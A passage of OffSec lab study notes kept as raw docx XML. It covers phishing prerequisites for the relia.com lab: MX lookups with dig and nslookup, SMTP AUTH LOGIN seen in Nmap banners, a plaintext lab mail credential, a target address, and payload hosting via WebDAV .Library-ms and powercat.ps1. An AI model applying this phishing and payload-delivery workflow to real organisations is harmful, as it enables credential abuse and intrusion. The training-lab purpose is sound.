        <w:t xml:space="preserve">And someone from offsec discord also said that it's required the target mailing machine needed to be MX (Mail Exchange) for the target domain. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FC">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FD">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To check who is the MX for your domain:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">dig MX relia.com +short</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000026FF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> relia.com </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">with your domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002700">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example Output:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002701">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10 mail1.relia.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002702">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">20 mail2.relia.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002703">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="679"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The numbers are priority values (lower is higher priority). These are the servers other mail servers use to deliver mail to @relia.com.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002704">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002705">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can also check MX for domain using nslookup:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002706">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002707">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; set type=mx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002708">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="313"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; relia.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002709">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the Nmap scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 25 (SMTP) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– Standard, but often restricted or unauthenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="579"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You authenticated via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTH LOGIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the port was open with that capability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="579"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 587 (SMTP with STARTTLS)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Most important here, as this is typically used for authenticated and encrypted email sending. Your swaks command likely used this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000270F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="579"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You authenticated via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTH LOGIN</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and the port was open with that capability.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002710">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Therefore, for sending the phishing mail, port 587 was the critical one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002711">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002712">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2806700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="342" name="image346.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image346.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81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713">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can see </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AUTH LOGIN </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">in the banner of nmap scan for BOTH 25 and 587</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002714">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Means that the mail server (SMTP) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">supports authentication using username and password!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002715">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002716">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Other Open Ports (Not Essential for the Phishing Itself but Contextually Useful)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002717">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">110 (POP3) and 143 (IMAP) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– Used to receive mail. Not needed for your attack unless you wanted to check if the target received/opened the mail (e.g., on a box you own).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002718">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">445/139 (SMB) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– Could be useful if you wanted to do payload delivery via SMB shares.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002719">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5985 (WinRM) </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">– Could allow post-exploitation RCE if you get creds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="823"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">135 (MSRPC)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Background Windows service, not directly useful in this case.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Non-Port Prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here’s a checklist of other prerequisites that must be satisfied for this type of attack to work:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Valid SMTP credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000271F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You need a working email/password pair (maildmz@relia.com : DPuBT9tGCBrTbR).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002720">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These creds must be allowed to send mail via the target SMTP server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002721">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SMTP server that allows authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002722">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It must support AUTH LOGIN, which your target did (as shown by smtp-commands in Nmap).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002723">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Target email address you want to phish</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002724">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In your case: </w:t>
      </w:r>
      <w:hyperlink r:id="rId814">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">jim@relia.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002725">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload delivery infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002726">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WebDAV server to host the .Library-ms file (served over HTTP, usually port 80).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002727">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP server to host powercat.ps1 (also port 8000 in your case).</w:t>
      </w:r>
    </w:p>
